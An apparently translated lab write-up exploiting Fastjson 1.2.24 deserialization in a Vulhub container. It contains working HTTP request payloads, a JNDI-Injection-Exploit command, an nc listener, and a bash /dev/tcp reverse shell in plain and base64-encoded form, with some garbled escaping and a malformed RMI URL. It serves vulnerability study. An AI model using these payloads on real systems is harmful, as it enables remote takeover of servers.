Table of Contents
Preface
Test environment preparation
dnslog test
Build rmi server & prepare malicious classes
Reference JdbcRowSetImpl attack
Rebound shell$ command execution
Summarize
Keywords: fastjson 1.2.24 deserialization leads to arbitrary command execution vulnerability
Note: This penetration test is all conducted in a virtual machine and is only for learning and communication. Please do not attack other people’s servers on the actual network.
Foreword
The most original requirement is to parse string parameters into json format data, but the json library does not meet the existing functions (many packages have this feature, a wonderful way to use it) and also supports parsing strings into javabeans; in parsing When becoming jacabean, some internal get methods may be called. And the Fastjson library can also automatically infer the specific type corresponding to the object through the @type annotation, thereby correctly converting JSON strings into Java objects.
Example,
String jsonString = "{"@type":"json.Student","age":5,"name\ ":"Tom","telephone":"123456"}";
JSONObject jsonObject = JSON.parseObject(jsonString);
System.out.println(jsonObject);
System.out.println(jsonObject.getClass());
output
However, in the actual test, I found that different java classes are processed differently by the fastjson library. Take the java.net.Inet4Address class as an example, {“a”:{“@type”:\ “java.net.Inet4Address”,”val”:”xxx.dnslog.cn”}} fastjson will eventually call the getByName method in the java.net.Inet4Address class, and the incoming host is the dnslog address of val .
Since you can specify any class to instantiate, and some internal get methods can be called, the parameters are still controlled. Then this may cause some security issues.
This test exploits the fastjson deserialization vulnerability to allow the target host to execute a command to rebound the shell.
Note: This penetration test is all conducted in a virtual machine only for learning and communication. Please do not attack other people’s servers on the actual network.
Test environment preparation
This time, the container platform Vulhub is used. Go to the vulhub/fastjson/1.2.24-rce directory in the Ubuntu virtual machine and execute the command to start the vulnerable container: docker-compose up-d
Visit site
dnslog test
A service like this uses a post method to create a dnslog. Payload preparation:
dnslog:{“a”:{“@type”:”java.net.Inet4Address”,”val”:”xxx.dnslog.cn”} }
Content-Type: application/json //Note that this header must be added
Request content payload reference
POST/HTTP/1.1
Host: 192.168.218.134:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 77{“a”:{“@type”:”java.net.Inet4Address”,”val”:”f6ac1ab5b7.ipv6.1433.eu.org..”}}
Build rmi server & prepare malicious class
1. This time, the JNDI-Injection-Exploit tool is used to directly attack. (Download address: I also found it online)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "xxxxxxxxxxxxxxxxxxxxxxxxxx" -A "192.168.218.1"
-C specifies the command to be executed by the target host, and -A specifies the local listening IP.
2. Prepare the rebound shell command to be executed
bash -i > & amp; /dev/tcp/
/ 0> & amp;1
However, in the actual test, this command was always unsuccessful and could not rebound the shell. My guess is that some characters may have been transcoded during transmission.
Solution: Use base64 to decode and execute in bash. Put the base64 encoding of the command bash -i > & amp; /dev/tcp/192.168.218.1/4444 0> & amp;1 into the following location
bash -c {echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4LjIxOC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
Specify this command with JNDI-Injection-Exploit tool -C to generate the rmi server.
3.nc listens to port 4444 on this machine and waits for the rebound shell connection
Quote JdbcRowSetImpl attack
Put the address of the generated rmi service into the payload:dataSourceName value
POST/HTTP/1.1
Host: 192.168.218.134:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 77{
“a”:{
“@type”:”com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:”rmi://http://192.168.218.1:1099/nc78zv”,
“autoCommit”:true
}
}
Type the request package and observe the information output by the JNDI-Injection-Exploit tool
As expected, when the server requests the rmi service, rmi returns a malicious network path. The server then requests this path to download and attempts to instantiate the malicious class. log a request to http:……
Rebound shell$ command execution
At this time, check whether our nc rebounds the shell
Is it possible to execute the command
Summary
Pay attention, purely handwritten.
The knowledge points of the article match the official knowledge files, and you can further learn related knowledge. Network Skill TreeHomepageOverview 42137 people are learning the system